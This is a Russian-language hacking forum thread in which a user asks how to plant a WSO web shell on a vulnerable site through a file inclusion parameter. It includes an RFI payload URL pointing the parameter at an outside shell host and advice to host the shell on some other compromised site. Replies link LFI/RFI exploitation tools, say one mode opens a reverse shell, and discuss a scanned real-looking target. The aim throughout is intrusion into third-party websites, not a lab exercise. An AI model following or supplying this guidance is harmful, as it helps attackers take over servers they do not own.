Просмотр полной версии : Вопрос по [Possible] Local File Inclusion
httр://уязвимый-сайт/?переменная=http://сайт_где_у_нас.шелл/ну_и_сам.шелл
Если я shell залью на localhost то есть на свой сервер xampp (который стоит на пк)
httр://уязвимый-сайт/?переменная=http://localhost/WSO.php
Так подействует или нужен сайт с доменом ?
.SpoilerTarget" type="button">Spoiler: Скриншот
https://s8.hostingkartinok.com/uploads/images/2017/11/ec23d9a2066422d7731019fdf5538e78.png
на локалхосте не подействует
найди какой-нибудь левый шелл ненужный и туда залей , оттуда уже дернешь напрямую/ Но это надо чтобы было RFI
grimnir said:
↑ (https://antichat.live/posts/4147969/)
на локалхосте не подействует
найди какой-нибудь левый шелл ненужный и туда залей , оттуда уже дернешь напрямую
Ссылку на shell надо ставить за место search так же ? (на скрине показан лог уязвимости)
на скрине у тебя LFI а не RFI http://insafety.org/lfi.php
локальный инклуд означает, что есть возможность подключать и исполнять или читать файлы только в пределах уязвимого сервера по относительному пути к файлам (а точнее в пределах заданной в конфиге php open_basedir (https://hpc.name/redirector.html#http://ru.php.net/manual/ru/ini.core.php#ini.open-basedir), ибо она ограничивает доступные интерпретатору каталоги). При удалённом инклуде есть возможность подключать произвольные файлы с других серверов по их URL-адресам. RFI встречается гораздо реже, чем LFI и считается более опасной уязвимостью.
grimnir said:
↑ (https://antichat.live/posts/4147975/)
на скрине у тебя LFI а не RFI
http://insafety.org/lfi.php
локальный инклуд означает, что есть возможность подключать и исполнять или читать файлы только в пределах уязвимого сервера по относительному пути к файлам (а точнее в пределах заданной в конфиге php
open_basedir (https://hpc.name/redirector.html#http://ru.php.net/manual/ru/ini.core.php#ini.open-basedir)
, ибо она ограничивает доступные интерпретатору каталоги). При удалённом инклуде есть возможность подключать произвольные файлы с других серверов по их URL-адресам. RFI встречается гораздо реже, чем LFI и считается более опасной уязвимостью.
Получается залить или выполнить Shell я не могу
grimnir said:
↑ (https://antichat.live/posts/4147975/)
на скрине у тебя LFI а не RFI
http://insafety.org/lfi.php
локальный инклуд означает, что есть возможность подключать и исполнять или читать файлы только в пределах уязвимого сервера по относительному пути к файлам (а точнее в пределах заданной в конфиге php
open_basedir (https://hpc.name/redirector.html#http://ru.php.net/manual/ru/ini.core.php#ini.open-basedir)
, ибо она ограничивает доступные интерпретатору каталоги). При удалённом инклуде есть возможность подключать произвольные файлы с других серверов по их URL-адресам. RFI встречается гораздо реже, чем LFI и считается более опасной уязвимостью.
Эксплоиты или софт есть под эксплуатацию LFI не знаешь ? под win желательно не знаешь ? я один нашёл но он для линукса
https://github.com/D35m0nd142/Kadabra
http://kaoticcreations.blogspot.co.uk/2011/08/automated-lfirfi-scanning-exploiting.html
https://github.com/D35m0nd142/LFISuite
https://github.com/OsandaMalith/LFiFreak
grimnir said:
↑ (https://antichat.live/posts/4148027/)
https://github.com/D35m0nd142/Kadabra
http://kaoticcreations.blogspot.co.uk/2011/08/automated-lfirfi-scanning-exploiting.html
https://github.com/D35m0nd142/LFISuite
https://github.com/OsandaMalith/LFiFreak
Выбрал скан указал месте славоря, всё правильно сделал ?
.SpoilerTarget" type="button">Spoiler: Фото
https://s8.hostingkartinok.com/uploads/images/2017/11/a8431ba4405e1d3b9805c9ff8c2aaa5b.png
grimnir said:
↑ (https://antichat.live/posts/4148027/)
https://github.com/D35m0nd142/Kadabra
http://kaoticcreations.blogspot.co.uk/2011/08/automated-lfirfi-scanning-exploiting.html
https://github.com/D35m0nd142/LFISuite
https://github.com/OsandaMalith/LFiFreak
Дал ссылку пишет что уязвимый только вот не чем не отличается от других ссылок, в чём прикол ?
http://www.site.ru/search?q=/usr/local/cpanel/logs/access_log
И ещё не до конца понимаю что значит
1) Exploiter
2) Scanner
типа 1 это эксплуатация, а 2 это сканер
Exploiter пробует установить reverse shell
По поводу линка, высокая вероятность ложного срабатывания, т.к запрос идет поиск search?q= и сканеры очень часто пишут что возможно LFI ,но на деле не так
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot